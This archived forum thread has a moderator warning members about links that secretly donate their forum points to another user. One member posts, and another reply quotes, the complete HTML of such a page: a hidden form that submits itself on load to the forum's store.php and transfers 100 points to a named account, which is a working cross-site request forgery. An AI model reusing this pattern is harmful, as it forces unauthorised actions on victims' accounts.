Home

Important issue regarding suspicious links, please read!

Darth Groovy

There have been a number of issues, where people are posting links that cause you to donate points to some other user when you click them. This is not just going on at Yoda's Swamp, it is happening in other forums, but I felt obligated to warn you.

The issues at hand have been resolved, but that does not prevent us from stopping some other user to come and post a similar link.

If you see a suspicious link like this, first of all if you do not know the member, don't click it. If you click a link and loose points, report the post immediately, and do NOT under any circumstance quote the post, that causes the link to show up more than once, and makes more work for us, and more points for them.

If you have lost points recently do to these childish games, please contact an admin, and tell them where and who exactly you lost points too.

Thanks in advance,

Groovy

• Replies 63
  • Created
  • Last Reply

Thanks for Posting this Groovy, wasn't sure when if any mod would. I wish an admin had come along first and made an announcement of it, but oh well. I find this trick quite clever, but more so i find it low and dirty.

Well I'm donating anyway, but still I think it's pretty childish :) What will the punishment be for ppl who post such links?? Maybe it's better to warn them directly by giving them the HORRRRIBLE consequences :)

I think their points should be donated to Father Torque, who can donate them to ppl who need them :) Of course the victims should get their points back first...

You know, when this whole point system started and I saw how a user could donate points, I wondered if this was thing. Running a script or a URL that would donate points to another user. (Not that I wanted to do it, but just from more of a debugging issue) But I am lazy and did not do anything more than just briefly think this. I was wondering more how the community would react about the points from a socialogy aspect at the time.

Kinda surprised about it just now showing up, but really dissapointed that someone would take the time to do something like this when the reward is basically pointless.

I have the code for the last link.

<html>

<head>

<title></title>

</head>

<body onLoad="document.name.submit()">

<p><form action="http://www.lucasforums.com/store.php" name="name" method="post">

<input type="hidden" name="s" value="">

<input type="hidden" name="action" value="donatechanged">

<input type="hidden" name="donateusername" value="GreenJeanz">

<input type="hidden" name="storeid" value="5">

<input type="hidden" name="useridcool" value="29315">

<input type="hidden" name="donatemoney" value="100">

<input type="hidden" name="reason" value="Thrik is all full up, so here you go, GreenJeanz">

<br><p id='submitrow'><input type="submit" value="Click to continue"></form></body>

Originally posted by SamFisher

I have the code for the last link.

<html>

<head>

<title></title>

</head>

<body onLoad="document.name.submit()">

<p><form action="http://www.lucasforums.com/store.php" name="name" method="post">

<input type="hidden" name="s" value="">

<input type="hidden" name="action" value="donatechanged">

<input type="hidden" name="donateusername" value="GreenJeanz">

<input type="hidden" name="storeid" value="5">

<input type="hidden" name="useridcool" value="29315">

<input type="hidden" name="donatemoney" value="100">

<input type="hidden" name="reason" value="Thrik is all full up, so here you go, GreenJeanz">

<br><p id='submitrow'><input type="submit" value="Click to continue"></form></body>

That has peoples names in it just to let you know. You might not want to tell everyone.

Erm, no. I'm not involved in this business at all - hell, I didn't even know about it until roughly an hour ago when I read this thread.

Go back to begging people for credits so you can be on the richest 10 people list (remember when you kept PMing me about that?) and keep out of things regarding a brain.

Why do you people insult me? I'm not being obnoxious at all, in fact I've hardly said anything in this thread with the exception of defending myself.

Let's all forget about arguments and laugh at these two PM's Sam sent me in desperation to be a point hoarder like me.

You said that you would not spend any points, so how about giving me 500-1000 points?

Why do you hoard them? Can you help me get to the 'top 10 richest persons' please? I need about 600-700 points.

Originally posted by Thrik

Let's all forget about arguments

From a complete outsiders point of view, it seems like someone's trying to dodge the issue.

The issue that this thread is all about.

Just an observation.

Oh, and you might want to watch the flaming guys. We've got a thread for that you know ;)

I hope this situation can be sorted out, because it's causing a lot of hate in here. Not good.

Peace,

B.

Archived